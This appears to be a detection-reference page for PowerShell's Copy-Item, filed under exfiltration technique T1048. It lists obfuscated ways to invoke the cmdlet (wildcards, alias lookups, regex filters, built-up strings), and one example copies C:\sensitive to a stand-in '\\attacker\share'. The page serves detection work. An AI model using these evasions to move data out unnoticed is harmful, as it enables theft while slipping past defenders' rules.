Copy-Item

PowerShell exfiltration T1048

Copy files and directories. Used for staging payloads, copying sensitive data for exfiltration, or lateral file movement.

Binary Paths

Pattern	Notes
`& (gcm C-Im) -Path C:\sensitive -Destination \\attacker\share`	Wildcards in both verb and noun
`& (gcm Copy-It*) -Path ...`	Star matches 'em'
`& (gcm C?py-Item) -Path ...`	Single char wildcard replaces 'o'
`& (gcm C[n-p]py-Item) -Path ...`	Character range matches 'o' in Copy
`copy -Path src -Destination dst`	Alias 'copy' for Copy-Item
`cp -Path src -Destination dst`	Alias 'cp' for Copy-Item
`cpi -Path src -Destination dst`	Alias 'cpi' for Copy-Item
`& (gal cp?) -Path src -Destination dst`	Get-Alias with wildcard resolves 'cpi' — cp? avoids matching 'cli' (Clear-Item)
`& (gcm *-Item) -Path ...`	Prefix wildcard — note: matches Get-Item, Set-Item etc.
`& (DIR Alias:/cp?) -Path src -Destination dst`	Resolves cpi alias via PowerShell's Alias: PSDrive glob — cp? matches cpi (not cp, which is 2 chars)
`& (gcm * \| ? Name -match '^Co.*Item') -Path src -Destination dst`	Regex -match filter on all commands via Where-Object pipeline — regex alternative to glob wildcards
`& (gcm ('{0}-{1}' -f 'Copy','Item')) -Path src -Destination dst`	-f format operator constructs 'Copy-Item' from string fragments before gcm resolves it
`& (gcm ('Copy'+''+'-Item')) -Path src -Destination dst`	String concatenation builds the cmdlet name from literals — name never appears contiguous in source

Try typing Copy-Item or a full path like PowerShell cmdlet

Auto-generated detection rule for Copy-Item